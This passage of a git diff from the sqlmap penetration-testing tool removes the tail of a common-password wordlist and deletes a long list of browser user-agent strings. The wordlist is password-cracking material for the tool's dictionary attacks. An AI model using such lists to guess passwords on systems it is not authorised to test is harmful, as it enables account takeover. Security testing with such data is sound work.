-wms -wmsys -wob -wolf -wolf1 -wolfgang -wolverine -Wolverine -wolves -wombat -wombat1 -wonder -wood -Woodrow -woody -woofwoof -word -world -World -wps -wrangler -wright -wsh -wsm -www -wwwuser -xademo -xanadu -xanth -xavier -xcountry -xdp -x-files -xfiles -xla -x-men -xnc -xni -xnm -xnp -xns -xprt -xtr -xxx -xxx123 -xxxx -xxxxxx -xxxxxxxx -xyz -xyz123 -y -yamaha -yankee -yankees -yellow -yes -yoda -yogibear -yolanda -yomama -young -your_pass -yukon -yvette -yvonne -zachary -zack -zapata -zaphod -zebra -zebras -zenith -zephyr -zeppelin -zepplin -zeus -zhongguo -ziggy -zigzag -zoltan -zombie -zoomer -zorro -zwerg -zxc -zxc123 -zxcvb -Zxcvb -zxcvbn -zxcvbnm -Zxcvbnm -zzz diff --git a/txt/user-agents.txt b/txt/user-agents.txt deleted file mode 100644 index b36ddc21f38..00000000000 --- a/txt/user-agents.txt +++ /dev/null @@ -1,2078 +0,0 @@ -# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -# See the file 'doc/COPYING' for copying permission - -Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1) -Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30) -Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) -Mozilla/4.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.33 Safari/532.0 -Mozilla/4.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/4.0 (compatible; MSIE 6.0; Linux i686 ; en) Opera 9.70 -Mozilla/4.0 (compatible; MSIE 6.0; Mac_PowerPC; en) Opera 9.24 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.24 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.26 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; es-la) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 9.52 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.26 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.0; tr) Opera 10.10 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; de) Opera 10.10 -Mozilla/4.0 (compatible; MSIE 
6.0; X11; Linux i686; en) Opera 9.22 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 9.27 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.50 -Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux x86_64; en) Opera 9.60 -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; YPC 3.2.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; YPC 3.2.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.0.3705; Media Center PC 3.1; Alexa Toolbar; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.40607) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; FDM; .NET CLR 1.1.4322) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; Media Center PC 3.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30) -Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0) -Mozilla/4.0 (compatible; MSIE 8.0; Linux i686; en) Opera 10.51 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; ko) Opera 10.53 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; pl) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; en) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; ja) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.4; OfficeLivePatch.1.3; yie8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 4.0) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 
6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; .NET4.0C; .NET4.0E; Zune 4.7; InfoPath.3) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E) chromeframe/8.0.552.224 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 3.0) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; msn OptimizedIE8;ZHCN) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.3; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; Media Center PC 6.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8) -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; en) Opera 10.62 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; fr) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) -Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; de) Opera 10.62 -Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64; pl) Opera 11.00 -Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0) -Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0) -Mozilla/4.61 (Macintosh; I; PPC) -Mozilla/4.61 [en] (OS/2; U) -Mozilla/4.7 (compatible; OffByOne; Windows 2000) -Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1) -Mozilla/4.79 [en] (compatible; MSIE 7.0; Windows NT 5.0; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648) -Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC) -Mozilla/4.8 [en] (Windows NT 5.0; U) -Mozilla/5.0 (Linux i686 ; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.70 -Mozilla/5.0 (Linux i686; U; en; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51 -Mozilla/5.0 (Linux; U; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (MSIE 7.0; Macintosh; U; SunOS; X11; gu; SV1; InfoPath.2; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648) -Mozilla/5.0 (Macintosh; I; PPC Mac OS X Mach-O; en-US; rv:1.9a1) Gecko/20061204 Firefox/3.0a1 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_4) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 
Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24 -Mozilla/5.0 (Macintosh; Intel Mac OS X; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.27 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-GB; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.10) Gecko/2009122115 Firefox/3.0.17 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20090204 Firefox/3.1b3pre -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; fr; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; it; rv:1.9b4) Gecko/2008030317 Firefox/3.0b4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ko; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.0.13) Gecko/2009073021 Firefox/3.0.13 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 GTB5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20091218 Firefox 3.6b5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.7; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-gb) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/ Safari/530.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-gb) AppleWebKit/528.10+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.192 Safari/531.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.1 Safari/530.18 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/531.2+ (KHTML, like Gecko) Version/4.0.1 Safari/530.18 -Mozilla/5.0 (Macintosh; U; Intel 
Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.210.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.5 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.422.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.3 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; es-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fi-fi) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; fr-fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; nl-nl) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-cn) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.4 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) 
AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.204.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.212.1 Safari/532.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.209.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.212.0 Safari/532.0 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; nl-nl) AppleWebKit/532.3+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; de-at) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.343.0 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.70 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ru-ru) AppleWebKit/533.2+ (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ca-es) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; de-de) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; el-gr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.363.0 Safari/533.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) 
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.0 Safari/533.4 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.453.1 Safari/534.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-au) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.21.11 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/533.4+ (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us) AppleWebKit/534.1+ (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; it-it) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ko-kr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; ru-ru) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; zh-cn) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/6.0.414.0 Safari/534.1 -Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.210 Safari/534.10 -Mozilla/5.0 